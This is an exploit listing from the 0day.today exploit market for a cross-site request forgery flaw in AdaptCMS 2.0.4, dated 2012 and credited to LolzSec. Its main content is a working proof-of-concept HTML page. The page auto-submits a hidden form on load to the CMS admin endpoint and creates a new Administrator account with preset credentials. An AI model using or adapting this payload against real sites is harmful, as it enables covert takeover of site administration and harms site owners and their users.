[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AdaptCMS 2.0.4 CSRF Vulnerability

Author
LolzSec
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19578
Category
web applications
Date add
18-10-2012
Platform
php
# Exploit Title: AdaptCMS 2.0.4 CSRF Vulnerability
# Date: 18/10/2012
# Author: LolzSec
# Software Link: http://www.insanevisions.com/
# Category:: webapps
# Greetings to:    Da'One,Da'W0rm
#####################################################


[#] [ CSRF Add Admin ]
 
<html>
<body onload="document.form1.submit();">
<form action="http://[target]/admin.php?view=users&do=add2" method="post" name="form1">
<input type="hidden" name="username" value="webadmin">
<input type="hidden" name="password" value="pass123">
<input type="hidden" name="email" value="webadmin@webadmin.com">
<input type="hidden" name="group" value="Administrator">
</form>
</body>
</html>

########################################################################

#  0day.today [2024-11-15]  #